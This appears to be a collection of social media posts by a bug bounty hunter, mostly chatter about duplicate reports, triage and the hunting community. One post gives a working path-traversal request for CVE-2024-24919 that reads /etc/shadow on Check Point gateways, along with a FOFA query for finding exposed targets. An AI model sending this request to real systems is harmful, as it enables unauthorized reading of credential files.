If you are going to try, go all the way ✨️
Security Engineer | Bug bounty hunter | Pentester | Whitehat @Immunefi | Bugcrowd | HackerOne | HackenProof
CVE-2024-24919: allows an attacker to read info on Check Point and remote access. Just make a POST request to your target
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
---------
FOFA Query: app="Check_Point-SSL-Network-Extender"
I reported 6 valid bugs to Auth0! Almost all triaged, but 4 of them are externally tracked duplicate submissions! And 2 are internally duplicate!
What are your thoughts on this? The externally duplicate thing!
#BugBounty
Hi @TomNomNom, I always wanted to know which VPS service you are using during the recon stream with NahamSec! And also which terminal! Are you using WSL with some type of theme? I will be glad if you answer this.
I think social media apps take a lot of your valuable time! I will try to distance myself from them! And try to no longer post about bounties! It's better to keep things private!
Thanks for validating the report! This triager is very professional and calm! I really liked his behavior towards my report
@Hacker0x01
#bugbounty
#hackerone
From the one-week challenge! I got votes to hunt on the MetaMask, Trip, Ring and Compass programs! I hunted on all of them! Two bugs got duplicated! One bug is in triage state and the others are pending! I will post the bounty for the triaged bugs! Let's wait for the company response!
#bugbounty
* Happy side of bug bounty = Bounty
* What about the sad side? = Duplicates, N/A, Informational, Internally found 🥲
Drop what I am missing!
#BugBounty
Hi, I have a question for triagers. Is adding background music or a song to the PoC video OK? Or does it create a disturbance while focusing on the PoC?
#bugbounty
I was waiting for this! The mission challenge was actually hard! I was only able to get 2 flags out of all the parts! Thanks for the video
@NahamSec
Very much needed!
@_JohnHammond
Not applicable 🥲
1. Got an endpoint from Wayback
2. It is the registration form
3. Email parameter is present in the URL
4. Now when the user fills in and submits the registration, the registration will be sent to the email present in the URL
5. Attacker can change the email
#bugbounty